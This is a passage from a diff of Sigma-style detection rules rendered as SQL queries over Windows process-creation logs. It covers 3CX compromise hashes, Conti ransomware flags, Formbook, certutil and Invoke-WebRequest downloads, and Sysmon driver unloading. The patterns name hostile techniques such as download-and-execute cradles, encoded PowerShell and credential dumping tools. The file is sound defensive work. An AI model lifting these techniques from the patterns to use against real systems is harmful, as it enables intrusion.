OR NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN 
('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": 
"proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "status": "experimental", + 
"description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1027" 
@@ -6786,18 +6616,18 @@ "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.resource_development", "attack.t1587.001" 
@@ -6807,90 +6637,86 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], 
"falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND 
NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "status": "test", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "System administrator usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Suspicious Invoke-WebRequest Execution", + 
"id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR 
(ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { "title": "Suspicious Child Process Created as System", 
@@ -6912,581 +6738,540 @@ "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. 
Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": 
"4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", - "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
